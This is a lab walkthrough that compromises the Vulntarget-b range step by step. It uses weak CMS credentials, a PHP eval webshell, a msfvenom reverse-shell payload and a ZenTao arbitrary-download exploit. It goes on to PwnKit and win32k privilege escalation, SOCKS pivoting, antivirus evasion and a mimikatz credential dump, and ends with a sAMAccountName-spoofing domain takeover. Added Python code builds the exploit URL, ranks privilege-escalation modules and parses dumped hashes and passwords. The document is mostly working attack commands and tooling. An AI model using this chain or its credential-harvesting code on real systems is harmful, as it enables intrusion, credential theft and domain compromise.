Vulntarget-b

First, scan all ports:

nmap -p- 192.168.0.104

Quite a few ports are open, so go through them one at a time.

Port 80 serves no site,

but the site on port 81 is 极致CMS (JizhiCMS).

Port 4567 is clearly the default index.html of 宝塔 (BT Panel).

Port 8888 is the BT Panel login port.

So we can start with the CMS, looking it up in the PeiQi wiki:

https://peiqi.wgpsec.org/wiki/cms/

The weak credentials admin/admin123 log us into the admin backend.

I followed the writeup to reproduce it, but it did not show up on my local setup,

so I chose to write a webshell directly on the BT Panel machine.

I reverted the environment to a snapshot, so the CentOS box's external address has changed; don't worry about it.

Connect with AntSword (蚁剑) and use msf to get a shell.

BT Panel has restricted the dangerous PHP functions here (disable_functions), so the restriction is bypassed with an AntSword plugin.

Then get a reverse shell.

Generate the payload with msfvenom (LHOST is the attacker's address):

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=172.20.10.2 LPORT=5555 -f elf -o m3f.elf

Once in, we are running as the www user, so use msf's local exploit suggester:

run post/multi/recon/local_exploit_suggester

 #  Name                                                        Potentially Vulnerable?  Check Result
 1  exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec         Yes                      The target is vulnerable.
 2  exploit/linux/local/network_manager_vpnc_username_priv_esc  Yes                      The service is running, but could not be validated.
 3  exploit/linux/local/pkexec                                  Yes                      The service is running, but could not be validated.
 4  exploit/linux/local/su_login                                Yes                      The target appears to be vulnerable.

The first module (PwnKit, CVE-2021-4034, the only one whose check came back as confirmed vulnerable) escalates to root.

shell
python -c "import pty;pty.spawn('/bin/bash')"   # upgrade to an interactive TTY
cat /root/flag

First flag obtained.

Checking the network interfaces shows two NICs, so add a route through the session and start a SOCKS proxy:

run post/multi/manage/autoroute
run autoroute -p
bg
search socks_proxy
use 0                  # auxiliary/server/socks_proxy
set version 4a
run
jobs

This turns up the host ending in .66 (10.0.20.66).

Uploading fscan and scanning it once more is also an option ^_^

./fscan_386 -h 10.0.20.66

   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 10.0.20.66 is alive
[*] Icmp alive hosts len is: 1
10.0.20.66:8080 open
10.0.20.66:3306 open
10.0.20.66:445 open
10.0.20.66:139 open
10.0.20.66:135 open
[*] alive ports len is: 5
start vulscan
[*] NetBios: 10.0.20.66 VULNTARGET\WIN10
[*] WebTitle: http://10.0.20.66:8080 code:200 len:141 title:None
[+] InfoScan:http://10.0.20.66:8080 [禅道]
done 5/5
[*] scan finished, elapsed: 16.627957514s

The scan shows ZenTao (禅道) running on port 8080 (the NetBIOS line also tells us the host is WIN10 in the VULNTARGET domain).

Point the browser at the SOCKS proxy and take a look.

admin/Admin123

Weak credentials get us into the backend.

Back to the PeiQi wiki to look for an exploit.

This one ultimately worked:

https://peiqi.wgpsec.org/wiki/cms/%E7%A6%85%E9%81%93/%E7%A6%85%E9%81%93%2012.4.2%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%20CNVD-C-2020-121325.html

Because the .66 machine has no internet access but can reach the CentOS 7 box, we have ZenTao download the webshell from there.

First write a one-line PHP webshell into /tmp on CentOS (run the HTTP server below from /tmp and name the file sh.php, since that is the path the download link points at):

<?php @eval($_POST['cmd']); ?>

Then start a Python HTTP server so the .66 machine can fetch the file:

python -m SimpleHTTPServer 4567   # Python 2 (CentOS 7 default); on Python 3: python3 -m http.server 4567

Then trigger the download through ZenTao's client download endpoint:

index.php?m=client&f=download&version=1&link=SFRUUDovLzEwLjAuMjAuMzA6NDU2Ny9zaC5waHA=

The link parameter is base64; it decodes to HTTP://10.0.20.30:4567/sh.php
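As an added example (not code from the original writeup), the following Python builds and decodes ZenTao's `link` parameter so the request above can be reproduced and checked offline, and records the reachability constraint from the pivot: the download must point at an address the .66 host can actually reach. The ZenTao base URL (10.0.20.66:8080), the pivot URL (HTTP://10.0.20.30:4567/sh.php) and the attacker address 172.20.10.2 are taken from this range; the function names are my own.

```python
import base64
from urllib.parse import urlencode, urlparse, parse_qs

# Values from this range: the pivot serving the webshell, and the base64 seen in the request above
PIVOT_URL = "HTTP://10.0.20.30:4567/sh.php"
PAGE_LINK_B64 = "SFRUUDovLzEwLjAuMjAuMzA6NDU2Ny9zaC5waHA="


def encode_link(url: str) -> str:
    """ZenTao's m=client&f=download endpoint expects the remote URL base64-encoded in 'link'."""
    return base64.b64encode(url.encode()).decode()


def decode_link(b64: str) -> str:
    """Inverse of encode_link; useful when reading such a request back out of a proxy log."""
    return base64.b64decode(b64).decode()


def build_download_request(zentao_base: str, remote_url: str, version: str = "1") -> str:
    """Return the full GET URL that makes ZenTao fetch remote_url (the CNVD-C-2020-121325 vector)."""
    query = urlencode({"m": "client", "f": "download", "version": version,
                       "link": encode_link(remote_url)})
    return f"{zentao_base.rstrip('/')}/index.php?{query}"


def parse_download_request(url: str) -> dict:
    """Pull m/f/version and the decoded link out of a request URL."""
    fields = {k: v[0] for k, v in parse_qs(urlparse(url).query).items()}
    fields["link"] = decode_link(fields["link"])
    return fields


def reachable_from_target(remote_url: str, hosts_target_can_reach: set) -> bool:
    """The .66 box has no route to the internet, so the link must point at a host it can reach
    (the CentOS pivot), not at the attacker's own address."""
    return urlparse(remote_url).hostname in hosts_target_can_reach


if __name__ == "__main__":
    req = build_download_request("http://10.0.20.66:8080", PIVOT_URL)
    print(req)
    print(parse_download_request(req))
    print(reachable_from_target(PIVOT_URL, {"10.0.20.30"}))
```

`urlencode` percent-encodes the trailing `=` of the base64 as `%3D`; ZenTao decodes the query string before base64-decoding, so both forms are equivalent, and `parse_download_request` accepts either.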

Turn on AntSword's proxy setting and connect to the webshell.

Forward through an HTTP proxy on the CentOS pivot, which both networks can reach (the command below is goproxy's syntax):

./proxy http -t tcp -p "0.0.0.0:8080" --daemon

Then drop a payload and take a bind (forward-connect) shell, since the .66 machine cannot connect back out.

Huorong (火绒) AV is present on the box, so the payload was run through an AV-evasion tool first.

The shell is low-privileged.

run post/multi/recon/local_exploit_suggester

 #   Name                                                           Potentially Vulnerable?  Check Result
 1   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_fodhelper                      Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/bypassuac_sluihijack                     Yes                      The target appears to be vulnerable.
 6   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1909 build detected!
 7   exploit/windows/local/cve_2020_0796_smbghost                   Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/cve_2020_1313_system_orchestrator        Yes                      The target appears to be vulnerable.
 10  exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
 11  exploit/windows/local/cve_2020_17136                           Yes                      The target appears to be vulnerable. A vulnerable Windows 10 v1909 build was detected!
 12  exploit/windows/local/cve_2021_40449                           Yes                      The target appears to be vulnerable. Vulnerable Windows 10 v1909 build detected!
 13  exploit/windows/local/cve_2022_21882_win32k                    Yes                      The target appears to be vulnerable.
 14  exploit/windows/local/cve_2022_21999_spoolfool_privesc         Yes                      The target appears to be vulnerable.

The module used:

exploit/windows/local/cve_2022_21882_win32k
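Added example covering both suggester runs (the Linux table earlier and the Windows table above); it is not part of the original post. It parses the module rows and orders candidates by the strength of the check text, adding weight when the suggester reports an exact OS build match, and by default drops the bypassuac_* modules, which only lift an already-administrative user past UAC and do nothing for an unprivileged account. The sample input is the two tables from this writeup; the scoring scale and function names are my own convention, not Metasploit's.

```python
import re

# The two local_exploit_suggester tables from this writeup, used as sample input
LINUX_RUN = """
 1  exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec         Yes  The target is vulnerable.
 2  exploit/linux/local/network_manager_vpnc_username_priv_esc  Yes  The service is running, but could not be validated.
 3  exploit/linux/local/pkexec                                  Yes  The service is running, but could not be validated.
 4  exploit/linux/local/su_login                                Yes  The target appears to be vulnerable.
"""

WINDOWS_RUN = """
 1   exploit/windows/local/bypassuac_dotnet_profiler               Yes  The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_eventvwr                      Yes  The target appears to be vulnerable.
 3   exploit/windows/local/bypassuac_fodhelper                     Yes  The target appears to be vulnerable.
 4   exploit/windows/local/bypassuac_sdclt                         Yes  The target appears to be vulnerable.
 5   exploit/windows/local/bypassuac_sluihijack                    Yes  The target appears to be vulnerable.
 6   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move  Yes  The target appears to be vulnerable. Vulnerable Windows 10 v1909 build detected!
 7   exploit/windows/local/cve_2020_0796_smbghost                  Yes  The target appears to be vulnerable.
 8   exploit/windows/local/cve_2020_1048_printerdemon              Yes  The target appears to be vulnerable.
 9   exploit/windows/local/cve_2020_1313_system_orchestrator       Yes  The target appears to be vulnerable.
 10  exploit/windows/local/cve_2020_1337_printerdemon              Yes  The target appears to be vulnerable.
 11  exploit/windows/local/cve_2020_17136                          Yes  The target appears to be vulnerable. A vulnerable Windows 10 v1909 build was detected!
 12  exploit/windows/local/cve_2021_40449                          Yes  The target appears to be vulnerable. Vulnerable Windows 10 v1909 build detected!
 13  exploit/windows/local/cve_2022_21882_win32k                   Yes  The target appears to be vulnerable.
 14  exploit/windows/local/cve_2022_21999_spoolfool_privesc        Yes  The target appears to be vulnerable.
"""

# index, module path, Yes/No column, free-text check result
ROW = re.compile(r"^\s*(\d+)\s+(\S+)\s+(Yes|No)\s+(.*?)\s*$")


def parse_suggester(text):
    """Turn the suggester's table rows into dicts; header and blank lines are ignored."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            rows.append({"index": int(m[1]), "module": m[2],
                         "potentially": m[3] == "Yes", "result": m[4]})
    return rows


def confidence(result):
    """Map the check text to a comparable score (my own scale, not Metasploit's)."""
    r = result.lower()
    if "is vulnerable" in r:                 # the module's check() confirmed the bug
        score = 3
    elif "appears to be vulnerable" in r:    # version/heuristic match only
        score = 2
    elif "could not be validated" in r:      # service present, no real check possible
        score = 1
    else:
        score = 0
    if "build detected" in r or "build was detected" in r:
        score += 1                           # the module matched the exact OS build
    return score


def triage(rows, skip_uac_bypass=True):
    """Rank candidates by check strength, keeping the suggester's own order for ties.
    bypassuac_* modules need the current user to already be a local admin, so they are
    dropped by default when the goal is SYSTEM from an unprivileged shell."""
    ranked = []
    for r in rows:
        if not r["potentially"]:
            continue
        is_uac = "bypassuac" in r["module"]
        if skip_uac_bypass and is_uac:
            continue
        ranked.append(dict(r, score=confidence(r["result"]), uac_bypass=is_uac))
    ranked.sort(key=lambda r: (-r["score"], r["index"]))
    return ranked


if __name__ == "__main__":
    for name, run in (("linux", LINUX_RUN), ("windows", WINDOWS_RUN)):
        print(name)
        for r in triage(parse_suggester(run)):
            print(f"  {r['score']}  {r['module']}")
```

Ordered this way the Linux run puts the PwnKit module first, matching what was used above. The Windows run puts the three modules with a confirmed 1909 build match ahead of cve_2022_21882_win32k, which is what worked here, so treat the ranking as a starting point for trying modules, not a verdict.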

Privilege escalation succeeds.

Run mimikatz:

Authentication Id : 0 ; 14580245 (00000000:00de7a15)
Session           : CachedInteractive from 1
User Name         : Administrator
Domain            : VULNTARGET
Logon Server      : WIN-UH20PRD3EAO
Logon Time        : 2023/11/21 0:40:36
SID               : S-1-5-21-3374851086-947483859-3378876003-500
        msv :
         [00000003] Primary
         * Username   : Administrator
         * Domain     : VULNTARGET
         * NTLM       : 570a9a65db8fba761c1008a51d4c95ab
         * SHA1       : 759e689a07a84246d0b202a80f5fd9e335ca5392
         * DPAPI      : 498266e09dee384e15ad686ed4de3822
        tspkg :
        wdigest :
         * Username   : Administrator
         * Domain     : VULNTARGET
         * Password   : (null)
        kerberos :
         * Username   : Administrator
         * Domain     : VULNTARGET.COM
         * Password   : Admin@123
        ssp :
        credman :
        cloudap :
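Added example, not code from the original post: a small parser that turns a sekurlsa logon-session dump like the one above into structured records, so NTLM hashes and any cleartext passwords can be pulled out of a long dump without reading it by eye. The sample input is the block above (lab credentials from this range); provider and field names follow mimikatz's output format, and the function names are my own.

```python
import textwrap

# The mimikatz block shown above, used as sample input (lab credentials from this range)
SAMPLE_DUMP = textwrap.dedent("""\
    Authentication Id : 0 ; 14580245 (00000000:00de7a15)
    Session           : CachedInteractive from 1
    User Name         : Administrator
    Domain            : VULNTARGET
    Logon Server      : WIN-UH20PRD3EAO
    Logon Time        : 2023/11/21 0:40:36
    SID               : S-1-5-21-3374851086-947483859-3378876003-500
            msv :
             [00000003] Primary
             * Username   : Administrator
             * Domain     : VULNTARGET
             * NTLM       : 570a9a65db8fba761c1008a51d4c95ab
             * SHA1       : 759e689a07a84246d0b202a80f5fd9e335ca5392
             * DPAPI      : 498266e09dee384e15ad686ed4de3822
            tspkg :
            wdigest :
             * Username   : Administrator
             * Domain     : VULNTARGET
             * Password   : (null)
            kerberos :
             * Username   : Administrator
             * Domain     : VULNTARGET.COM
             * Password   : Admin@123
            ssp :
            credman :
            cloudap :
    """)


def parse_sekurlsa(text):
    """Split a sekurlsa dump into logon sessions.

    Each session is a dict of its header fields (User Name, Domain, SID, ...) plus
    'providers' -> {provider name: {field: value}}; mimikatz's '(null)' becomes None.
    """
    sessions, cur, provider = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Authentication Id"):      # a new logon session begins
            cur = {"Authentication Id": line.split(":", 1)[1].strip(), "providers": {}}
            sessions.append(cur)
            provider = None
            continue
        if cur is None:
            continue
        if line.startswith("*"):                      # "* NTLM : ..." inside a provider block
            key, _, val = line[1:].partition(":")
            if provider is not None:
                val = val.strip()
                cur["providers"][provider][key.strip()] = None if val == "(null)" else val
        elif line.endswith(":"):                      # provider header such as "msv :" or "kerberos :"
            provider = line[:-1].strip()
            cur["providers"].setdefault(provider, {})
        elif provider is None and ":" in line:        # session header field
            key, _, val = line.partition(":")
            cur[key.strip()] = val.strip()
        # anything else (e.g. "[00000003] Primary") carries no credential material
    return sessions


def extract_credentials(sessions):
    """Flatten sessions into (user, domain, type, value, source) records: NTLM hashes from msv,
    cleartext from any provider whose Password field is not null."""
    creds = []
    for s in sessions:
        for prov, fields in s["providers"].items():
            user = fields.get("Username") or s.get("User Name")
            domain = fields.get("Domain") or s.get("Domain")
            if fields.get("NTLM"):
                creds.append({"user": user, "domain": domain, "type": "ntlm",
                              "value": fields["NTLM"], "source": prov})
            if fields.get("Password"):
                creds.append({"user": user, "domain": domain, "type": "password",
                              "value": fields["Password"], "source": prov})
    return creds


if __name__ == "__main__":
    for c in extract_credentials(parse_sekurlsa(SAMPLE_DUMP)):
        print(c)
```

On this dump the wdigest provider holds no cleartext (`(null)`), as expected on a current Windows 10 build, while the kerberos provider still gave up the password; the NTLM hash from msv is usable on its own for pass-the-hash even when no provider yields a cleartext.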

Then use https://github.com/safebuffer/sam-the-admin (sAMAccountName spoofing, CVE-2021-42278/CVE-2021-42287) against the domain controller through the SOCKS proxy:

proxychains4 python3 sam_the_admin.py "vulntarget.com/win101:admin#123" -dc-ip 10.0.10.100 -shell

type c:\Users\Administrator\flag.txt